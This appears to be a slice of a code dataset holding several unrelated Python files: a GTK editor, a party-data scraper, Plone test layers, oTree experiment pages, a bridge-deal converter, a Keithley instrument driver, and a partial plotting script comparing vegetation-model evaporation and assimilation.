*args):\n\t\tself.config.read(\"config.ini\")\n\t\tif not os.path.isfile(\"config.ini\"):\n\t\t\tif not 'preferences' in self.config.sections():\n\t\t\t\tself.config.add_section('preferences')\n\t\t\tself.config.set('preferences', 'darkMode', 'False')\n\t\t\tself.config.set('preferences', 'highlightMatchingBrackets', 'False')\n\t\t\tself.config.set('preferences', 'highlightCurrentLine', 'False')\n\t\t\tself.config.set('preferences', 'showLines', 'False')\n\t\t\tself.config.set('preferences', 'autoComplete', 'False')\n\t\t\twith open(\"config.ini\", \"w+\") as _file:\n\t\t\t\tself.config.write(_file)\n\n\t\tself.darkMode = self.toBool(self.config.get('preferences', 'darkMode'))\n\t\tself.highlightMatchingBrackets = self.toBool(self.config.get('preferences', 'highlightMatchingBrackets'))\n\t\tself.highlightCurrentLine = self.toBool(self.config.get('preferences', 'highlightCurrentLine'))\n\t\tself.showLines = self.toBool(self.config.get('preferences', 'showLines'))\n\t\tself.autoComplete = self.toBool(self.config.get('preferences', 'autoComplete'))\n\n\tdef applySettings(self, *args):\n\t\t#print(\"hello world\")\n\t\tfor i in xrange(0, len(self.textEditor)):\n\t\t\tself.textEditor[i].set_show_line_numbers(self.showLines)\n\t\t\tself.tabs.show_all()\n\t\t\t#self.textEditor[i].set_highlight_matching_brackets(self.highlightMatchingBrackets)\n\t\tGtk.main_iteration()\n\n\tdef openSettings(self, *args):\n\t\t_setWindow = pyedsettings.settingsWindow()\n\t\t_setWindow.connect('destroy', self.applySettings)\n\n\tdef _run(self, *args):\n\t\t_filename = self.tabLabels[self.tabs.get_current_page()].get_text()\n\t\tnoExtension = _filename.split(\".\")[0]\n\t\tif \"c\" in _filename:\n\t\t\tflags = \"\"\n\t\t\tdialog = Gtk.Dialog(\"Compiler flags\", self, 0,(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,Gtk.STOCK_OK, Gtk.ResponseType.OK))\n\t\t\tarea = dialog.get_content_area()\n\t\t\tentry = Gtk.Entry()\n\t\t\tarea.add(entry)\n\t\t\tarea.show_all()\n\t\t\tresponse = dialog.run()\n\t\t\tdialog.destroy()\n\t\t\tif response == Gtk.ResponseType.OK:\n\t\t\t\tflags = entry.get_text()\n\t\t\t\tos.system(\"gcc -c \" + _filename + \" \" + flags)\n\t\t\t\tos.system(\"gcc \" + noExtension + \".o -o \" + noExtension + \" \" + flags)\n\t\t\t\tos.system(\"xterm -hold -e ./\" + noExtension)\n\n\tdef toBool(self, _string):\n\t\tif _string == \"True\":\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n_tmp = \"\"\nif len(sys.argv) >= 1:\n\twindow = editor(sys.argv)\n\twindow.show_all()\nelse:\n\twindow = editor(_tmp)\n\twindow.show_all()\n\nGtk.main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"454319620","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom congressional_data.constants import PARTY_ABBREVIATIONS\nfrom congressional_data.data_filling.utils.utils import (\n extract_tags,\n get_correct_url,\n get_wiki_article_name,\n ignored,\n init_session,\n parse_date,\n tags_to_text,\n)\nfrom congressional_data.models import PartyAbbreviation, PoliticalParty, get_or_create, get_or_create_with_created\n\n\ndef populate_parties(session):\n for abbrev, party_url in PARTY_ABBREVIATIONS.items():\n get_or_create_political_party(session, party_url, abbrev)\n session.commit()\n\n\ndef get_founded_date(soup):\n founded_date = parse_party_date(soup, 'Founded')\n return founded_date\n\n\ndef get_dissolved_date(soup):\n dissolved_date = parse_party_date(soup, 'Dissolved')\n return dissolved_date\n\n\ndef parse_party_date(soup, date_name):\n parsed_date, party_date_tag = None, None\n with ignored(AttributeError):\n infobox = soup.find('table', attrs={'class': 'infobox'})\n party_date_tag = infobox.find('th', text=date_name).next_sibling\n if party_date_tag:\n try:\n party_date = party_date_tag.find('span', attrs={'class': 'bday'}).text\n except AttributeError:\n extract_tags(party_date_tag.find_all('span'))\n party_date = tags_to_text(party_date_tag.contents).split(';')[0].split('[')[0]\n if party_date:\n with ignored(ValueError):\n parsed_date = parse_date(party_date)\n print('{}: {}'.format(date_name, parsed_date))\n return parsed_date\n\n\ndef update_political_party(party):\n if party.url and not party.name:\n print('Scraping party data from {}'.format(party.name, party.url))\n founded_date, dissolved_date, name = scrape_political_party(party.url)\n if not party.name and name:\n party.name = name\n if founded_date:\n party.founded = founded_date\n if dissolved_date:\n party.dissolved = dissolved_date\n if not party.founded:\n party.founded = parse_date('0001-01-01')\n if not party.dissolved:\n party.dissolved = parse_date('9999-01-01')\n\n\ndef scrape_political_party(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'lxml')\n name_tag = soup.find('span', attrs={'class': 'fn org'})\n if not name_tag:\n name_tag = get_wiki_article_name(soup)\n founded_date = get_founded_date(soup)\n dissolved_date = get_dissolved_date(soup)\n return founded_date, dissolved_date, tags_to_text(name_tag)\n\n\ndef get_or_create_political_party(session, party_link, abbreviation=None):\n party, created = get_or_create_with_created(session, PoliticalParty, url=get_correct_url(session, party_link))\n if abbreviation:\n get_or_create(session, PartyAbbreviation, abbreviation=abbreviation, party_id=party.id)\n if created:\n update_political_party(party)\n return party.id\n\n\ndef update_parties():\n for party in session.query(PoliticalParty).filter(PoliticalParty.name.is_(None)):\n update_political_party(party)\n session.commit()\n\n\nif __name__ == '__main__':\n session = init_session()\n # fix_professions()\n populate_parties(session)\n update_parties()\n session.close()\n","sub_path":"data_filling/parties.py","file_name":"parties.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91169688","text":"from plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import FunctionalTesting\n\nfrom plone.testing import z2\n\nfrom zope.configuration import xmlconfig\n\n\nclass ProyectopolicyLayer(PloneSandboxLayer):\n\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n # Load ZCML\n import proyecto.policy\n xmlconfig.file(\n 'configure.zcml',\n proyecto.policy,\n context=configurationContext\n )\n\n # Install products that use an old-style initialize() function\n #z2.installProduct(app, 'Products.PloneFormGen')\n\n# def tearDownZope(self, app):\n# # Uninstall products installed above\n# z2.uninstallProduct(app, 'Products.PloneFormGen')\n\n def setUpPloneSite(self, portal):\n applyProfile(portal, 'proyecto.policy:default')\n\nPROYECTO_POLICY_FIXTURE = ProyectopolicyLayer()\nPROYECTO_POLICY_INTEGRATION_TESTING = IntegrationTesting(\n bases=(PROYECTO_POLICY_FIXTURE,),\n name=\"ProyectopolicyLayer:Integration\"\n)\nPROYECTO_POLICY_FUNCTIONAL_TESTING = FunctionalTesting(\n bases=(PROYECTO_POLICY_FIXTURE, z2.ZSERVER_FIXTURE),\n name=\"ProyectopolicyLayer:Functional\"\n)\n","sub_path":"src/proyecto.policy/src/proyecto/policy/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461199877","text":"from otree.api import Currency as c, currency_range\nfrom ._builtin import Page, WaitPage\nfrom .models import Constants\n\nclass Instruction(Page):\n def vars_for_template(self):\n return dict(\n pay_inattent=Constants.pay_inattention\n )\n\nclass Instructions(Page):\n pass\n\nclass Instructions2(Page):\n pass\n\nclass Popup(Page):\n pass\n\nclass DemoIntro(Page):\n pass\n\nclass Type(Page):\n pass\n\nclass Demo(Page):\n def js_vars(self):\n if self.player.type == 'r1':\n random_draw=Constants.high_example\n lower_bound=Constants.high_ability[0]\n upper_bound=Constants.high_ability[1]\n elif self.player.type == 'r2':\n random_draw=Constants.low_example\n lower_bound=Constants.low_ability[0]\n upper_bound=Constants.low_ability[1]\n return dict(\n random_draw=random_draw,\n animation_time=Constants.animation_time,\n min=lower_bound,\n max=upper_bound,\n )\n\nclass TrueStart(Page):\n pass\n\nclass Task(Page):\n timeout_seconds = Constants.task_timeout\n form_model = 'player'\n form_fields = [\n 'draw_1','draw_2','draw_3','draw_4','draw_5','draw_6',\n 'draw_7','draw_8','draw_9','draw_10','draw_11','draw_12',\n 'draw_13','draw_14','draw_15','draw_16','draw_17','draw_18',\n 'draw_19','draw_20','current_max_is','num_draws','attention_check',\n 'prompt_counter','Task_warnings'\n ]\n def js_vars(self):\n pop_up_start=Constants.pop_up_time\n pop_up_end=(Constants.pop_up_time-Constants.pop_up_duration)\n if self.player.type == 'r1':\n lower_bound=Constants.high_ability[0]\n upper_bound=Constants.high_ability[1]\n elif self.player.type == 'r2':\n lower_bound=Constants.low_ability[0]\n upper_bound=Constants.low_ability[1]\n return dict(\n min=lower_bound,\n max=upper_bound,\n pop_up_start=pop_up_start,\n pop_up_end=pop_up_end,\n animation_time=Constants.animation_time\n )\n\nclass ResultsWaitPage(WaitPage):\n after_all_players_arrive = 'set_payoffs'\n\n\nclass Individual_Results(Page):\n def vars_for_template(self):\n me = self.player\n return dict(\n my_performance=me.current_max_is,\n my_costs=Constants.cost * me.num_draws,\n pay_inattent=Constants.pay_inattention\n )\n\nclass Hypothetical1(Page):\n form_model = 'player'\n form_fields = ['strategy']\n\nclass Hypothetical2(Page):\n form_model = 'player'\n form_fields = ['altcost']\n\n def vars_for_template(self):\n return dict(\n cost=Constants.cost,\n cost_alt=Constants.cost_alt\n )\n\n\nclass Hypothetical3(Page):\n form_model = 'player'\n form_fields = ['altbound']\n\n def vars_for_template(self):\n if self.player.type == 'r1':\n lower_bound=Constants.high_ability[0]\n upper_bound=Constants.high_ability[1]\n lower_alt=Constants.high_ability_alt[0]\n upper_alt=Constants.high_ability_alt[1]\n elif self.player.type == 'r2':\n lower_bound=Constants.low_ability[0]\n upper_bound=Constants.low_ability[1]\n lower_alt=Constants.low_ability_alt[0]\n upper_alt=Constants.low_ability_alt[1]\n return dict(\n min=lower_bound,\n max=upper_bound,\n min_alt=lower_alt,\n max_alt=upper_alt,\n )\n\n\nclass Hypothetical4(Page):\n form_model = 'player'\n form_fields = ['belief']\n\n def vars_for_template(self):\n if self.player.type == 'r1':\n lower_opp=Constants.low_ability[0]\n upper_opp=Constants.low_ability[1]\n elif self.player.type == 'r2':\n lower_opp=Constants.high_ability[0]\n upper_opp=Constants.high_ability[1]\n return dict(\n min_opp=lower_opp,\n max_opp=upper_opp,\n )\n\nclass Hypothetical5(Page):\n form_model = 'player'\n form_fields = ['expectation']\n\nclass Hypothetical6(Page):\n form_model = 'player'\n form_fields = ['ideal']\n\n\nclass Total_Results(Page):\n def vars_for_template(self):\n me = self.player\n opponent = me.get_others_in_group()[0]\n return dict(\n my_performance=me.current_max_is,\n my_costs=me.total_costs,\n my_payoff=me.payoff,\n my_payoff_real_money=me.payoff.to_real_world_currency(self.session),\n other_performance=opponent.current_max_is,\n total_performance=me.group.total_performance,\n pay_inattent=Constants.pay_inattention\n )\n\n def is_displayed(self):\n return self.player.group.is_noisy == 0\n\n\nclass Total_Results_Noisy(Page):\n def vars_for_template(self):\n me = self.player\n opponent = me.get_others_in_group()[0]\n return dict(\n my_performance=me.current_max_is,\n my_costs=me.total_costs,\n my_payoff=me.payoff,\n my_payoff_real_money=me.payoff.to_real_world_currency(self.session),\n other_performance=opponent.current_max_is,\n total_performance=me.group.total_performance,\n noise=me.group.noise,\n )\n\n def is_displayed(self):\n return self.player.group.is_noisy == 1\n\n\n\npage_sequence = [\n Instruction,\n# Instructions2,\n# Popup,\n Type,\n DemoIntro,\n Demo,\n TrueStart,\n Task,\n Individual_Results,\n Hypothetical1,\n Hypothetical2,\n Hypothetical3,\n Hypothetical4,\n Hypothetical5,\n Hypothetical6,\n ResultsWaitPage,\n Total_Results,\n Total_Results_Noisy]\n","sub_path":"main_exp_noisy/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"163424873","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 5 14:09:53 2018\n\n@author: scander.mustapha\n\"\"\"\n\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom BridgeDeal import BridgeDeal\n\nCARDMAP = {\n 's2': 0, 's3': 1, 's4': 2, 's5': 3, 's6': 4, 's7': 5, 's8': 6, 's9': 7, 'st': 8, 'sj': 9, 'sq': 10, 'sk': 11, 'sa': 12,\n 'h2': 13, 'h3': 14, 'h4': 15, 'h5': 16, 'h6': 17, 'h7': 18, 'h8': 19, 'h9': 20, 'ht': 21, 'hj': 22, 'hq': 23, 'hk': 24, 'ha': 25,\n 'd2': 26, 'd3': 27, 'd4': 28, 'd5': 29, 'd6': 30, 'd7': 31, 'd8': 32, 'd9': 33, 'dt': 34, 'dj': 35, 'dq': 36, 'dk': 37, 'da': 38,\n 'c2': 39, 'c3': 40, 'c4': 41, 'c5': 42, 'c6': 43, 'c7': 44, 'c8': 45, 'c9': 46, 'ct': 47, 'cj': 48, 'cq': 49, 'ck': 50, 'ca': 51\n }\n\ndef convert_deal(deal):\n south = np.where(deal.hands[0])[0]\n west = np.where(deal.hands[1])[0]\n north = np.where(deal.hands[2])[0]\n east = np.where(deal.hands[3])[0]\n bidding = [0 for _ in range(24)]\n bidding[:len(deal.bidding)] = deal.bidding\n bidding = np.array(bidding)\n dealer = deal.dealer\n leader = deal.leader\n lead = CARDMAP[deal.lead.lower()]\n vuln = deal.vuln\n return [*south, *west, *north, *east, *bidding, dealer, leader, lead, vuln]\n\ndef create_dataframe(pickle_name,store_name):\n store = pd.HDFStore(store_name, \"w\", complib=str(\"zlib\"), complevel=5)\n with open(pickle_name, 'rb') as f:\n data = pickle.load(f)\n \n data = [d for d in data if len(d.bidding) < 25]\n d = map(convert_deal, data)\n columns = []\n for hand in ['south', 'west', 'north', 'east']:\n columns.extend(['{1}{0}'.format(i+1, hand) for i in range(13)])\n columns.extend(['bidding{0}'.format(i+1) for i in range(24)])\n columns.extend(['dealer', 'leader', 'lead', 'vuln'])\n \n \n df = pd.DataFrame(list(d), columns=columns, dtype='int32')\n store.put('df', df, data_columns=df.columns)\n store.close()\n","sub_path":"reinforcement_learning/data/dataframe_creator.py","file_name":"dataframe_creator.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143798287","text":"# Communicating with Benchtop YOKOGAWA dc-power supply\n# Communicating with Benchtop PSG\nfrom colorama import init, Fore, Back\ninit(autoreset=True) #to convert termcolor to wins color\n\nfrom os.path import basename as bs\nmdlname = bs(__file__).split('.')[0] # model's name e.g. ESG, PSG, AWG, VSA, ADC\ndebugger = 'debug' + mdlname\n\nimport pyvisa as visa\nfrom functools import wraps\nfrom time import sleep, time\nfrom contextlib import suppress\nfrom pyqum.instrument.logger import address, set_status, status_code\nfrom pyqum.instrument.toolbox import waveform\n\ndef debug(state=False):\n exec('%s %s; %s = %s' %('global', debugger, debugger, 'state'), globals(), locals()) # open global and local both-ways channels!\n if state:\n print(Back.RED + '%s: Debugging Mode' %debugger.replace('debug', ''))\n return\n\ndebug() # declare the debugger mode here\n\n# INITIALIZATION\ndef Initiate(reset=False, which=1):\n ad = address()\n rs = ad.lookup(mdlname, which) # Instrument's Address\n rm = visa.ResourceManager()\n try:\n bench = rm.open_resource(rs) #establishing connection using GPIB# with the machine\n if reset:\n stat = bench.write('RC') #Clear buffer memory\n else:\n stat = bench.write(':SYSTem:PRESet')\n bench.read_termination = '\\n' #omit termination tag from output \n bench.timeout = 15000 #set timeout in ms\n set_status(mdlname, dict(state='connected'))\n print(Fore.GREEN + \"%s's connection Initialized: %s\" % (mdlname, str(stat)))\n ad.update_machine(1, \"%s_%s\"%(mdlname,which))\n except: \n # raise\n set_status(mdlname, dict(state='DISCONNECTED'))\n print(Fore.RED + \"%s's connection NOT FOUND\" % mdlname)\n # bench = \"disconnected\"\n return bench\n\ndef single_pulse(bench, width, height):\n '''width in seconds, height in volts\n ON: 20ms, OFF: 50ms\n '''\n # set compliances\n Compliance = 0.200 #0.08\n bench.write(\":SENS:CURR:PROT %s\"%Compliance)\n bench.write(\":SENS:CURR:RANGe %s\"%Compliance)\n\n # set range\n # bench.write(\":SENS:VOLT:RANGe %s\" %height)\n \n # pulse sequence\n bench.write(\":SOUR:LIST:VOLT 0,%s,0\" %height)\n bench.write(\":TRIG:COUN 3\")\n bench.write(\":SOUR:DEL %s\" %width)\n\n return_width = float(bench.query(\"SOUR:DEL?\"))\n bench.write(\":SOUR:VOLT:MODE LIST\")\n bench.write(\":OUTPUT ON\")\n\n bench.write(\":FORMAT:ELEM VOLT,CURR\")\n VI_List = [float(x) for x in bench.query(\":READ?\").split(',')]\n \n return return_width, VI_List\n\n\ndef close(bench, reset=False, which=1):\n bench.write(\":OUTPUT OFF\")\n if reset:\n bench.write(':SYSTem:PRESet')\n set_status(mdlname, dict(config='return to zero-off'))\n else: set_status(mdlname, dict(config='previous'))\n try:\n bench.close() #None means Success?\n status = \"Success\"\n ad = address()\n ad.update_machine(0, \"%s_%s\"%(mdlname,which))\n except: status = \"Error\"\n set_status(mdlname, dict(state='disconnected'))\n print(Back.WHITE + Fore.BLACK + \"%s's connection Closed\" %(mdlname))\n return status\n \n\n# Test Zone\ndef test(detail=True):\n debug(detail)\n print(Back.WHITE + Fore.MAGENTA + \"Debugger mode: %s\" %eval(debugger))\n s = Initiate()\n if eval(debugger):\n stat = single_pulse(s, 0.02, 10)\n print(\"KEITHLEY READ: %s\" %stat)\n else: print(Fore.RED + \"Basic IO Test\")\n close(s, True)\n return\n\n# test()\n","sub_path":"TEST/FACE/pyqum/instrument/machine/KEIT.py","file_name":"KEIT.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"130206182","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#***********************************************************************\n# plot_meanannuals.py\n# Plots mean annual values of VOM simulations and simulations of Whitley et al. (2016). \n# \n#-----------------------------------------------------------------------\n# Authors: Remko Nijzink\n# Now at: LIST (Luxembourg Institute of Science and Technology)\n#-----------------------------------------------------------------------\n#\n# Copyright (C) 2020 LIST (Luxembourg Institute of Science and Technology), all right reserved.\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#***********************************************************************\n\n\n\nimport os\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom datetime import datetime, timedelta, date\nfrom matplotlib.pyplot import imread\nimport matplotlib.cbook as cbook\nfrom netCDF4 import Dataset\nimport argparse\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Plots mean annual values of VOM simulations and simulations of Whitley et al. (2016).\")\n\n parser.add_argument(\"-o\", \"--outfile\", help=\"outputfile with plot\")\n parser.add_argument(\"--vom\", help=\"VOM results\", nargs='+')\n parser.add_argument(\"--bess\", help=\"bess input files\", nargs='+')\n parser.add_argument(\"--bios2\", help=\"bios2 input files\", nargs='+')\n parser.add_argument(\"--lpjguess\", help=\"lpj-guess input files, first all files with et, second gpp\", nargs='+')\n parser.add_argument(\"--maespa\", help=\"maespa input files\", nargs='+')\n parser.add_argument(\"--spa\", help=\"spa input files\", nargs='+')\n parser.add_argument(\"--cable\", help=\"cable input files\", nargs='+')\n parser.add_argument(\"--sites\", help=\"study sites, should correspond to the number and order of inputfiles\", nargs='+')\n parser.add_argument(\"--whitley_sites\", help=\"mask the study sites that are also used in Whitley et al.\",nargs='+', type=int )\n parser.add_argument(\"--dingo_et\", help=\"DINGO files evaporation\", nargs='+')\n parser.add_argument(\"--dingo_gpp\", help=\"DINGO files assimilation\", nargs='+')\n parser.add_argument(\"--i2015\", help=\"results_daily AoB2015 \")\n parser.add_argument(\"--sharex\", help=\"share x-axis \", type=bool, default = True)\n parser.add_argument(\"--figsize\", help=\"figure size\", nargs='+', type=float, default = [15,7] )\n\n args = parser.parse_args()\n\n ###################################\n #some constants for conversions\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 997 #[kg/m3]\n\n ###################################\n #read in data from Whitley et al. \n whitley_sites = np.array(args.sites)[np.array(args.whitley_sites)==1]\n\n bess_assma = dict()\n bess_ema = dict()\n bios2_assma = dict()\n bios2_ema = dict()\n lpjguess_assma = dict()\n lpjguess_ema = dict()\n maespa_assma = dict()\n maespa_ema = dict()\n spa_assma = dict()\n spa_ema = dict()\n cable_assma = dict()\n cable_ema = dict()\n\n for i in range(0, len(whitley_sites)):\n #read in data from BESS\n evap_tmp, ass_tmp = read_bess(args.bess[i])\n\n bess_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n bess_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from BIOS2\n evap_tmp, ass_tmp = read_bios2(args.bios2[i])\n bios2_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n bios2_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from LPJ-GUESS, ET in W/m2, GPP in umol/m2/s\n evap_tmp, ass_tmp = read_lpjguess(args.lpjguess[i], args.lpjguess[i+len(whitley_sites)])\n lpjguess_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n lpjguess_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from MAESPA, ET in W m-2, GPP in umol m-2 s-1\n evap_tmp, ass_tmp = read_maespa(args.maespa[i])\n maespa_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n maespa_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from SPA, ET in W m-2, GPP in mmol m-2 s-1\n evap_tmp, ass_tmp = read_spa(args.spa[i])\n spa_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n spa_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from CABLE, ET in kg/m^2/s, GPP in umol/m^2/s\n evap_tmp, ass_tmp = read_cable(args.cable[i])\n cable_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n cable_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n ####################################################\n #load other data \n\n dingo_evap = dict()\n dingo_gpp = dict()\n vom_evap = dict()\n vom_gpp = dict()\n for i in range(0, len(args.sites)):\n ea_tmp = np.loadtxt(args.dingo_et[i], usecols=2) #mm/d\n le_tmp = ea_tmp * lat_heat_vapor * rho_w * 1000/(3600*24) \n le_time = np.genfromtxt(args.dingo_et[i],usecols=0, dtype=np.str )#mm/d\n le_time = pd.date_range(le_time[0], le_time[-1], freq='D') \n e_pd = pd.Series(ea_tmp, index = le_time) \n\n gpp_tmp = np.loadtxt(args.dingo_gpp[i], usecols=2) #mm/d\n gpp_obs = -1000000*gpp_tmp/ (3600*24)\n gpp_time = np.genfromtxt(args.dingo_gpp[i],usecols=0, dtype=np.str )#mm/d\n gpp_time= pd.date_range(gpp_time[0], gpp_time[-1], freq='D') \n gpp_pd = pd.Series(-gpp_tmp, index = gpp_time) \n\n dingo_evap[args.sites[i]] = np.mean( e_pd.resample(\"A\").sum() )\n dingo_gpp[args.sites[i]] = np.mean( gpp_pd.resample(\"A\").sum() )\n\n vom_tmp = np.genfromtxt(args.vom[i], names=True)\n etot = (vom_tmp[\"esoil\"] + vom_tmp[\"etmt\"] + vom_tmp[\"etmg\"])*1000\n letot= etot[-3650:]* lat_heat_vapor * rho_w * 1000 * 1000/(3600*24)\n #gpptot = 1000000*(vom_tmp[\"assg\"] + vom_tmp[\"asst\"] )/ (3600*24)\n gpptot = vom_tmp[\"assg\"] + vom_tmp[\"asst\"]\n\n time = pd.date_range(datetime(int(vom_tmp[\"fyear\"][3]),int(vom_tmp[\"fmonth\"][0]),int(vom_tmp[\"fday\"][0])), \n datetime(int(vom_tmp[\"fyear\"][-1]),int(vom_tmp[\"fmonth\"][-1]),int(vom_tmp[\"fday\"][-1])), \n freq='D')\n\n\n emod_pd = pd.Series(etot[-3650:], index = time[-3650:] )\n assmod_pd = pd.Series(gpptot[-3650:], index = time[-3650:] )\n\n vom_evap[args.sites[i]] = np.mean( emod_pd.resample(\"A\").sum() )\n vom_gpp[args.sites[i]] = np.mean( assmod_pd.resample(\"A\").sum() )\n \n\n\n\n ####################################################\n #start plotting\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(args.figsize[0], args.figsize[1]), sharex=False,gridspec_kw = {'wspace':0.2, 'hspace':-0.3} )\n ax = axes.flat\n\n ax[0].set_axisbelow(True)\n ax[0].grid(color='gray', linestyle='dashed')\n ax[1].set_axisbelow(True)\n ax[1].grid(color='gray', linestyle='dashed')\n\n iplot = 0\n #loop over study sites\n for isite in range(0, len(args.sites)): \n\n #ensemble years from Whitley\n try:\n ax[0].scatter(isite, bess_ema[args.sites[isite]],color=\"purple\")\n ax[0].scatter(isite, bios2_ema[args.sites[isite]],color=\"lightgreen\")\n ax[0].scatter(isite, cable_ema[args.sites[isite]],color=\"red\")\n ax[0].scatter(isite, maespa_ema[args.sites[isite]],color=\"gold\")\n ax[0].scatter(isite, spa_ema[args.sites[isite]],color=\"pink\")\n ax[0].scatter(isite, lpjguess_ema[args.sites[isite]],color=\"lightblue\")\n\n if( isite == 0):\n ax[1].scatter(isite, bess_assma[args.sites[isite]],color=\"purple\", label = \"BESS\")\n ax[1].scatter(isite, bios2_assma[args.sites[isite]],color=\"lightgreen\", label = \"BIOS2\")\n ax[1].scatter(isite, cable_assma[args.sites[isite]],color=\"red\", label = \"CABLE\")\n ax[1].scatter(isite, maespa_assma[args.sites[isite]],color=\"gold\", label = \"MAESPA\")\n ax[1].scatter(isite, spa_assma[args.sites[isite]],color=\"pink\", label = \"SPA\")\n ax[1].scatter(isite, lpjguess_assma[args.sites[isite]],color=\"lightblue\", label = \"LPJ-GUESS\")\n else:\n ax[1].scatter(isite, bess_assma[args.sites[isite]],color=\"purple\")\n ax[1].scatter(isite, bios2_assma[args.sites[isite]],color=\"lightgreen\")\n ax[1].scatter(isite, cable_assma[args.sites[isite]],color=\"red\")\n ax[1].scatter(isite, maespa_assma[args.sites[isite]],color=\"gold\")\n ax[1].scatter(isite, spa_assma[args.sites[isite]],color=\"pink\")\n ax[1].scatter(isite, lpjguess_assma[args.sites[isite]],color=\"lightblue\")\n \n except KeyError:\n print(\"Litchfield\")\n\n\n if( isite == 0):\n ax[0].scatter(isite, vom_evap[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\" )\n ax[0].scatter(isite, dingo_evap[args.sites[isite]],color=\"black\", s=75, marker= \"*\" )\n\n ax[1].scatter(isite, vom_gpp[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\", label = \"VOM\" )\n ax[1].scatter(isite, dingo_gpp[args.sites[isite]],color=\"black\", s=75, marker= \"*\", label = \"Obs.\" )\n else:\n ax[0].scatter(isite, vom_evap[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\")\n ax[0].scatter(isite, dingo_evap[args.sites[isite]],color=\"black\", s=75, marker= \"*\" )\n\n ax[1].scatter(isite, vom_gpp[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\" )\n ax[1].scatter(isite, dingo_gpp[args.sites[isite]],color=\"black\", s=75, marker= \"*\" )\n\n\n\n\n\n\n #ax[iplot].set_ylim([ 0, 180 ])\n ax[0].set_xlim([ -1, 6 ]) \n #ax[iplot].set_aspect(0.8)\n ax[0].set_ylabel(r'LE (W/m$^2$) ', size=18 )\n \n #ax[iplot].set_yticks(range(0,200,20))\n #ax[iplot].set_yticklabels(range(0,200,20))\n\n ax[0].set_xticks(range(0,7))\n ax[0].set_xticklabels( ('Howard Springs', 'Litchfield', 'Adelaide River', 'Daly Uncleared', 'Dry River', \"Sturt Plains\"),rotation=90, fontsize=18) \n ax[0].set_ylabel(r'Evaporation [mm/year]', fontsize=18)\n\n\n ax[1].set_ylabel(r'Assimilation [mol/m$^2$/year]', fontsize=18)\n ax[1].set_xlim([ -1, 6 ]) \n ax[1].set_xticks(range(0,7))\n ax[1].set_xticklabels( ('Howard Springs', 'Litchfield', 'Adelaide River', 'Daly Uncleared', 'Dry River', \"Sturt Plains\"),rotation=90, fontsize=18) \n\n\n plt.legend(bbox_to_anchor=(1, 1)) \n plt.tight_layout()\n #plt.savefig(\"../data/img/4_fitness.png\", bbox_inches = \"tight\")\n plt.show()\n\n\n\ndef read_bess(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\") \n time = pd.date_range(\"01-01-2000\", periods = len(data[:,0]), freq='D')\n\n tmp = 24*60*60*data[:,1] /( lat_heat_vapor * rho_w * 1000 )\n\n #make pandas series and return daily values\n evap_pd = pd.Series(tmp, index = time ) #mm/day\n ass_pd = pd.Series(data[:,1]*24*60*60*10**-6, index = time ) #umol/m2/d\n\n return evap_pd, ass_pd\n\ndef read_bios2(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 